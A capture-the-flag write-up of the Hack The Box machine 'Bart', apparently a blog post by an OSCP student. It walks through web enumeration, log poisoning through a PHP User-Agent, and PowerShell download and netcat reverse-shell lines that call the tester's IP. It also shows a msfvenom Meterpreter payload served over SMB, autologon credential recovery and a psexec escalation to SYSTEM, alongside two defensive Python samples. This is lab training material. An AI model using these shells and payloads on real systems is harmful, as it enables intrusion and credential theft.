Introduction

I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution is one I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box, because Bart is a prime example of the kind of box you could get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry in advance if there are any quality control mistakes; it’s too early for me.

Enumeration

Initial Scanning

Like with every Hack The Box machine, let’s begin with an nmap scan against Bart (10.10.10.81).

root@dastinia:~/htb/bart# nmap -sV -sC 10.10.10.81 -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for 10.10.10.81
Host is up (0.18s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds

We see that the only available service is the IIS web server on port 80. From the Microsoft-IIS/10.0 server header we can also infer that this is most likely a Windows Server 2016 or Windows 10 system under the hood.

Enumerating Port 80 (forum.bart.htb, WordPress)

From our nmap scan we can see that we are automatically redirected to forum.bart.htb. Since HTB doesn’t provide DNS for the lab, we aren’t going to be able to resolve the name. We can add entries to our /etc/hosts file to point both bart.htb and forum.bart.htb at 10.10.10.81.

adding the /etc/hosts entry

root@dastinia:~/htb/bart# echo "10.10.10.81 forum.bart.htb" >> /etc/hosts
root@dastinia:~/htb/bart# echo "10.10.10.81 bart.htb" >> /etc/hosts

Visiting forum.bart.htb in a browser brings us to a snazzy single-page WordPress site.

Attempting to access the WordPress login page results in an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site, so it is likely some sort of rabbit hole.

Running gobuster against forum.bart.htb doesn’t reveal anything particularly interesting. Thinking that there may be hidden content within the site, we mirror it with wget and search the local copy for interesting content such as email addresses, extra domain names, or hidden pages.

We were able to discover a few potential emails/usernames, but nothing that stood out on its own. We did notice that the Bart developer Harvey Potter (h.potter@bart.htb) is the only member of the team not displayed on the main site, yet whose information is stored in a comment on the page.

mirroring site locally

root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/
forum.bart.htb/index.html:<title>BART</title>
forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css' href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' />
forum.bart.htb/index.html:    <h1 class="site-title"><a href="#" rel="home">BART</a></h1>
forum.bart.htb/index.html:    <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:    <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:    <div class="pos">CEO@BART</div>
forum.bart.htb/index.html:    <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:    <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:    <div class="pos">Developer@BART</div>
forum.bart.htb/index.html:    <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li>
...[snip]...

a better grep to extract just the email addresses

root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"
forum.bart.htb/index.html:s.brown@bart.local
forum.bart.htb/index.html:d.simmons@bart.htb
forum.bart.htb/index.html:r.hilton@bart.htb
forum.bart.htb/index.html:h.potter@bart.htb
forum.bart.htb/index.html:info@bart.htb
forum.bart.htb/index.html:info@bart.htb

Discovering Monitoring Portal with Wfuzz

Taking a step back and enumerating the root of the domain, bart.htb, with gobuster, you discover that the site seems to return some kind of content for every request.

gobuster on bart.htb

root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://bart.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
=====================================================
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)
...[snip]...

Visiting the site in a browser you see that every page you attempt to go to returns the same error page. It is pretty common for modern web applications to serve a custom error page with a 200 status instead of a standard 404 response saying that something was wrong.

This renders tools like gobuster, dirb or dirbuster basically useless for gathering information, since the results will be full of false positives or will require additional post-processing to figure out what’s actually real.

To circumvent this we can use wfuzz as our directory brute forcer and filter the results against a character-count baseline. As you can see below, wfuzz reports the error page as having 158607 characters in the response. We can use that as our baseline and hide every response with 158607 characters using the --hh flag, which leaves only the pages that differ, i.e. the ones with unique content.

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines    Word     Chars       Payload
==================================================================

000001:  C=302      0 L        0 W        0 Ch    "# directory-list-2.3-medium.txt"
000002:  C=302      0 L        0 W        0 Ch    "#"
000009:  C=302      0 L        0 W        0 Ch    "# Suite 300, San Francisco, California, 94105, USA."
000003:  C=302      0 L        0 W        0 Ch    "# Copyright 2007 James Fisher"
000004:  C=302      0 L        0 W        0 Ch    "#"
000005:  C=302      0 L        0 W        0 Ch    "# This work is licensed under the Creative Commons"
000016:  C=200    630 L     3775 W   158607 Ch    "images"
000018:  C=200    630 L     3775 W   158607 Ch    "2006"
000017:  C=200    630 L     3775 W   158607 Ch    "download"
000026:  C=200    630 L     3775 W   158607 Ch    "about"
000021:  C=200    630 L     3775 W   158607 Ch    "serial"
000025:  C=200    630 L     3775 W   158607 Ch    "contact"
000027:  C=200    630 L     3775 W   158607 Ch    "search"
000028:  C=200    630 L     3775 W   158607 Ch    "spacer"
000022:  C=200    630 L     3775 W   158607 Ch    "warez"
000023:  C=200    630 L     3775 W   158607 Ch    "full"
000019:  C=200    630 L     3775 W   158607 Ch    "news"
000024:  C=200    630 L     3775 W   158607 Ch    "12"
000032:  C=200    630 L     3775 W   158607 Ch    "blog"
000029:  C=200    630 L     3775 W   158607 Ch    "privacy"
000034:  C=200    630 L     3775 W   158607 Ch    "10"
000073:  C=200    630 L     3775 W   158607 Ch    "category"
000031:  C=200    630 L     3775 W   158607 Ch    "logo"
000080:  C=200    630 L     3775 W   158607 Ch    "media"
000075:  C=200    630 L     3775 W   158607 Ch    "content"
000033:  C=200    630 L     3775 W   158607 Ch    "new"
000079:  C=200    630 L     3775 W   158607 Ch    "press"
000076:  C=200    630 L     3775 W   158607 Ch    "14"
000083:  C=200    630 L     3775 W   158607 Ch    "icons"
000081:  C=200    630 L     3775 W   158607 Ch    "templates"
000082:  C=200    630 L     3775 W   158607 Ch    "services"
000020:  C=200    630 L     3775 W   158607 Ch    "crack"
000030:  C=200    630 L     3775 W   158607 Ch    "11"
000035:  C=200    630 L     3775 W   158607 Ch    "cgi-bin"
000077:  C=200    630 L     3775 W   158607 Ch    "main"

Using Wfuzz to hide the error page responses

root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://bart.htb/FUZZ/
Total requests: 220560

==================================================================
ID      Response   Lines    Word     Chars       Payload
==================================================================

000014:  C=302      0 L        0 W        0 Ch    ""
000067:  C=200    548 L     2412 W    35529 Ch    "forum"
001614:  C=200     80 L      221 W     3423 Ch    "monitor"
002385:  C=200    548 L     2412 W    35529 Ch    "Forum"
019837:  C=200     80 L      221 W     3423 Ch    "Monitor"

From our results we can see that there’s distinct content being served from the “forum” and “monitor” directories, the forum being the forum.bart.htb site we already looked at.
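The size-baseline trick wfuzz applies with --hh, as an added Python example that is not part of the original write-up: it calibrates the catch-all page length automatically by requesting a path that cannot exist, then reports only wordlist entries whose response differs, and it goes one step beyond the write-up by collapsing case variants (IIS paths are case-insensitive, which is why both Forum and forum show up above). The fetch function and the fake site it runs against are constructed stand-ins built from the response sizes shown above.

```python
import secrets
from typing import Callable, Dict, List, Optional, Tuple

Fetch = Callable[[str], Tuple[int, str]]  # path -> (HTTP status, response body)

# Constructed stand-in for bart.htb: known paths answer normally, everything
# else gets the same 200 "error" page, which is what defeats plain gobuster.
ERROR_PAGE = "x" * 158607
FAKE_SITE: Dict[str, Tuple[int, str]] = {
    "forum": (200, "y" * 35529),
    "monitor": (200, "z" * 3423),
}


def fake_fetch(path: str) -> Tuple[int, str]:
    """Simulated GET http://bart.htb/<path>/ ; lookups are case-insensitive like IIS."""
    return FAKE_SITE.get(path.lower(), (200, ERROR_PAGE))


def calibrate(fetch: Fetch) -> int:
    """Request a random path that cannot exist and return the body length.

    On a catch-all site this is the error page size, i.e. the value the
    write-up found by eye (158607) and passed to wfuzz as --hh.
    """
    _status, body = fetch(secrets.token_hex(12))
    return len(body)


def fuzz(words: List[str], fetch: Fetch,
         hide_chars: Optional[int] = None) -> List[Tuple[str, int, int]]:
    """Return (payload, status, chars) for words whose response differs from baseline.

    Case variants of an already-tested word are skipped because IIS treats
    /Forum/ and /forum/ as the same resource.
    """
    if hide_chars is None:
        hide_chars = calibrate(fetch)
    hits: List[Tuple[str, int, int]] = []
    seen = set()
    for word in words:
        key = word.lower()
        if key in seen:
            continue
        seen.add(key)
        status, body = fetch(word)
        if len(body) != hide_chars:
            hits.append((word, status, len(body)))
    return hits


if __name__ == "__main__":
    wordlist = ["images", "2006", "forum", "download", "monitor", "Forum", "Monitor"]
    for hit in fuzz(wordlist, fake_fetch):
        print(hit)
```

For live use, swap in a fetcher built on urllib; if the error page echoes the requested path, compare on the body with that path stripped out rather than on raw length, since the size would then drift by a few bytes per word.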

monitor.bart.htb

Visiting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.

After trying the usual Hack The Box username:password combinations with no luck, we begin looking for another avenue into this application. PHP Server Monitor has a password reset function which only takes a username. When you attempt a password reset for a user that doesn’t exist, you get the following error.

Since the error differs for existing and non-existing users, we can use it to enumerate usernames in a targeted manner with the information gathered from forum.bart.htb.

I compiled a short list of possible user names from the site:

potential usernames compiled from forum.bart.htb

root@dastinia:~/htb/bart# cat names.txt
s.brown@bart.local
d.simmons@bart.htb
r.hilton@bart.htb
h.potter@bart.htb
info@bart.htb
s.brown
d.simmons
r.hilton
h.potter
info
samantha
brown
daniel
simmons
robert
hilton
harvey
potter

We can use Burp Suite Intruder with the simple list payload type to perform this enumeration.

This is how we set up Burp Suite Intruder for the attack.

From the results of our Intruder attack we see that we have two valid usernames: harvey and daniel.

After some educated guessing you will discover a valid username:password combination of harvey:potter.

When you attempt to authenticate you are redirected to monitor.bart.htb, which fails to resolve just like forum.bart.htb did. We add monitor.bart.htb to our /etc/hosts file and authenticate again with our newly found credentials.

root@dastinia:~# echo "10.10.10.81 monitor.bart.htb " >> /etc/hosts

After we re-authenticate we are greeted with the following page.

Browsing around you see there is an entry for the “Internal Chat” service.

Viewing the details of “Internal Chat” reveals another application on a different host name, “internal-01.bart.htb”.

Exploitation

Simple Chat Source Code Discovery & Account Registration

Visiting internal-01.bart.htb in our browser reveals the login page of Bart’s internal “dev chat”.

While gobuster and sqlmap run in the background, some googling for “simple chat” turns up the following GitHub repo: https://github.com/magkopian/php-ajax-simple-chat. To validate that the two applications are the same, I inspected the css/chat_global.css file and sure enough it matched. Looking at the application’s code we see that there is registration functionality. The application doesn’t directly give you an option to register an account, but it seems shoddily built, so we can try manually crafting the registration request and hope nothing changed (we know the location and the parameters required to register an account from auditing the register.php source code).

Sure enough, by crafting the request just right we are able to register an account with a username:password of medic:medicmedic on the internal dev chat.

Getting RCE through LFI & Log Poisoning

Clicking the log link causes two alerts to appear that seemingly do nothing. Inspecting the original application code, there are no references to any “log” functionality, so this must be a third-party modification. After some fiddling and inspecting the request history in Burp Suite, you will see that the application records the username and your User-Agent in a log file, as seen below.

Since we control our User-Agent, and the filename parameter lets us name the log file with a .php extension, we can get PHP code executed by simply visiting the log file afterwards.

GET //log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9
Connection: close
Upgrade-Insecure-Requests: 1

To speed this up I recommend having two or three Repeater tabs open: one to send the command in the User-Agent, and one to request the log page and trigger the execution.
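The same request seen from the server side, as an added defender’s example that is not from the original write-up: a small parser for IIS W3C logs that flags the two tells of this log-poisoning attempt, a PHP open tag in the User-Agent and a filename parameter pointing at a script extension. The log lines are constructed samples in the default IIS field layout (IIS writes the User-Agent with spaces replaced by +).

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS log excerpt modelled on the request shown above.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2018-07-12 04:00:10 10.10.10.81 GET /log/log.php username=harvey&filename=log.txt 80 - 10.10.15.171 Mozilla/5.0+(X11;+Linux+x86_64;+rv:52.0)+Gecko/20100101+Firefox/52.0 - 200 0 0 31
2018-07-12 04:00:42 10.10.10.81 GET /log/log.php username=harvey&filename=log.php 80 - 10.10.15.171 <?php+exec('whoami');+?>+Mozilla/5.0+(X11;+Linux+x86_64;+rv:52.0) - 200 0 0 47
2018-07-12 04:01:05 10.10.10.81 GET /simple_chat/chat.php - 80 - 10.10.15.171 Mozilla/5.0+(X11;+Linux+x86_64;+rv:52.0)+Gecko/20100101+Firefox/52.0 - 200 0 0 12
2018-07-12 04:05:33 10.10.10.81 GET /log/log.php username=harvey&filename=log.php 80 - 10.10.15.171 <?=+1;?> - 200 0 0 40
"""

PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)          # <?php ... or <?= ...
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):  # IIS encodes inner spaces as '+'
                rows.append(dict(zip(fields, parts)))
    return rows


def find_poisoning(text: str) -> List[Dict[str, str]]:
    """Return one finding per log row that looks like a log-poisoning attempt."""
    findings: List[Dict[str, str]] = []
    for row in parse_w3c(text):
        ua = unquote_plus(row.get("cs(User-Agent)", ""))
        query = parse_qs(row.get("cs-uri-query", ""))
        filename = query.get("filename", [""])[0]
        reasons = []
        if PHP_TAG.search(ua):
            reasons.append("php tag in user-agent")
        if SCRIPT_EXT.search(filename):
            reasons.append(f"script filename {filename}")
        if reasons:
            findings.append({
                "time": f"{row['date']} {row['time']}",
                "client": row["c-ip"],
                "uri": row["cs-uri-stem"],
                "reasons": "; ".join(reasons),
            })
    return findings


if __name__ == "__main__":
    for finding in find_poisoning(SAMPLE_LOG):
        print(finding)
```

The fix on the application side is the mirror image: never let the client choose the log file name or extension, and write user-controlled headers to a file that the web server will not execute.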

We upload and execute a 64-bit netcat binary on the machine (the architecture matters later) so we can get an interactive shell.

I injected the following code into the User-Agent field. Make sure you remember the \ escapes.

<?php echo exec ( "powershell -command \" (New-Object System.Net.WebClient).DownloadFile('http://10.10.15.171:7777/nc.exe','nc.exe') \" " ); ?>

<?php exec ( "nc.exe 10.10.15.171 6667 -e cmd.exe" ); ?>

catching the shell

root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on 0.0.0.0:6667
Ncat: Connection from 10.10.10.81.
Ncat: Connection from 10.10.10.81:49886.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\internal-01\log>dir
 Volume in drive C has no label.
 Volume Serial Number is F84E-9CF7

 Directory of C:\inetpub\wwwroot\internal-01\log

12/07/2018  04:06    <DIR>          .
12/07/2018  04:06    <DIR>          ..
12/07/2018  04:00               101 log.ph
12/07/2018  04:05             2,643 log.php
12/07/2018  04:01               303 log.txt
21/02/2018  20:44    <DIR>          Microsoft
12/07/2018  04:06            59,392 nc.exe
               4 File(s)         62,439 bytes
               3 Dir(s)  15,505,301,504 bytes free

C:\inetpub\wwwroot\internal-01\log>whoami
nt authority\iusr

Privilege Escalation

Poking around the system you will see that there’s not much going on. It’s a pretty recent build of Windows, which rules out a good chunk of kernel-based LPE exploits. Poking around the application folders you discover the password for the MySQL database, as seen below. You will realize this was unhelpful after trying the password against all the user accounts present on the box.

C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php
...[snip]...
function db_connect() {
    $con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
    if ($con === false) {
        return false;
    }
    mysqli_set_charset ($con , 'UTF-8');
    return $con;
}
?>

Getting an x64 Meterpreter shell with Impacket

Let’s generate an x64 Meterpreter payload and host it on an SMB share with Impacket.

generating the payload with msfvenom

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.171 LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

serving the payload with impacket-smbserver

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.81,49813)
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141

setting up the multi/handler listener

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf exploit(multi/handler) > set ExitonSession False
ExitonSession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 10.10.15.171:6969

executing our payload from the SMB share and getting a shell

C:\inetpub\wwwroot\internal-01\log>\\10.10.15.171\kk\6969.exe

session

msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 1 opened (10.10.15.171:6969 -> 10.10.10.81:51934) at 2018-07-14 11:44:39 -0400

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART  10.10.15.171:6969 -> 10.10.10.81:51934 (10.10.10.81)

The Meterpreter session will die after some time, and the AV on the system will delete the payload shortly after you execute it from the SMB share.

Recovering Administrator AutoLogon Credentials

At this point I did a good chunk of manual enumeration on the system. After manually going through the standard Windows privilege escalation techniques, you discover that there are credentials stored in the Winlogon autologon registry key. Here are a few resources I felt are pretty decent at explaining what to look for in local Windows privilege escalation: Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation.

For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.

It did work from PowerShell with the following command:

Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"

Since we are already using Metasploit for this box, there is a post-exploitation module, windows_autologin, which extracts any autologon credentials from the registry.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set SESSION 7
SESSION => 7
msf post(windows/gather/credentials/windows_autologin) > run

[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed

Getting System with PTH/PSEXEC

Now that we have the Administrator’s credentials, getting SYSTEM should be a snap.

We can perform a Pass the Hash attack with Metasploit’s various psexec modules. We first need to add a route through our existing session so that the module can reach SMB port 445, which only listens locally on the box. This is done with Metasploit’s route add command.

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass => 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.15.171\\\kk\\\6969.exe
COMMAND => \\10.10.15.171\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) > set RHOSTS 10.10.10.81
RHOSTS => 10.10.10.81
msf auxiliary(admin/smb/psexec_command) > options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   COMMAND               \\10.10.15.171\kk\6969.exe        yes       The command you want to execute on the remote host
   RHOSTS                10.10.10.81                       yes       The target address range or CIDR identifier
   RPORT                 445                               yes       The Target port
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             .                                 no        The Windows domain to use for authentication
   SMBPass               3130438f31186fbaf962f407711faddb  no        The password for the specified username
   SMBSHARE              C$                                yes       The name of a writeable share on the server
   SMBUser               Administrator                     no        The username to authenticate as
   THREADS               1                                 yes       The number of concurrent threads
   WINPATH               WINDOWS                           yes       The name of the remote Windows directory

msf auxiliary(admin/smb/psexec_command) > route add 10.10.10.81/32 255.255.255.255 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) > run

[+] 10.10.10.81:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.10.81:445 - checking if the file is unlocked
[*] 10.10.10.81:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.10.81:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.10.81:445 - Getting the command output...
[*] 10.10.10.81:445 - Command finished with no output
[*] 10.10.10.81:445 - Executing cleanup...
[+] 10.10.10.81:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) > [*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 8 opened (10.10.15.171:6969 -> 10.10.10.81:49866) at 2018-07-14 01:15:57 -0400

msf auxiliary(admin/smb/psexec_command) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  7         meterpreter x64/windows  NT AUTHORITY\IUSR @ BART    10.10.15.171:6969 -> 10.10.10.81:49863 (10.10.10.81)
  8         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BART  10.10.15.171:6969 -> 10.10.10.81:49866 (10.10.10.81)

msf auxiliary(admin/smb/psexec_command) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : BART
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That’s all for now. I’m pretty busy with the OSCP and work, so hopefully the next few boxes are machines I already have write-ups completed for. I’ll also update this post on how to complete the box without Metasploit after I get some sleep.